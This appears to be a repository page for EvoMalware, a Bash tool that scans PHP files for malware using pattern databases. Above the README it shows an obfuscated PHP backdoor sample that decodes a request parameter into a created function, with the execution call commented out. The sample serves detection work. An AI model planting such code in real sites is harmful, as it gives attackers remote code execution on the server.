Benoît S.
4c89a12f28
if(isset($_REQUEST['sort'])){ ^M
$string = $_REQUEST['sort'];^M
$array_name = '';^M
$alphabet = "wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";^M
$ar = array(8,38,15,7,6,4,26,25,7,34,24,25,7);^M
foreach($ar as $t){^M
$array_name .= $alphabet[$t];^M
}^M
$a = strrev("noi"."tcnuf"."_eta"."erc");^M
$f = $a("", $array_name($string));^M
// MALWARE $f();^M
exit();^M
}
|
||
|---|---|---|
| Makefile | ||
| README.md | ||
| evomalware.filenames | ||
| evomalware.filenames.md5 | ||
| evomalware.patterns | ||
| evomalware.patterns.md5 | ||
| evomalware.sh | ||
| evomalware.suspect | ||
| evomalware.suspect.md5 | ||
| evomalware.whitelist | ||
| evomalware.whitelist.md5 | ||
README.md
Description
EvoMalware is a BASH script which permits to identify files (PHP only ATM)
infected by malwares/virus/backdoor.
The main goal is to be used in a cron job to generate reports, but it can be
used in "one shot" mode.
The script uses 3 flat text files as databases:
- evomalware.filenames, known filenames.
- evomalware.patterns, known patterns.
- evomalware.whitelist, files to ignore.
There is also an "aggressive" mode which permits to find suspect files using
evomalware.suspect DB.
At each run, the script downloads the last databases.
Configuration/Tuning
TODO
Upstream
Upstream is at https://forge.evolix.org/projects/evomalware
GitHub is a mirror.
Interesting others projects
- WPScan, http://wpscan.org/
- Plecost, https://github.com/iniqua/plecost
- Linux Malware Detect (with ClamAV), https://www.rfxn.com/projects/linux-malware-detect/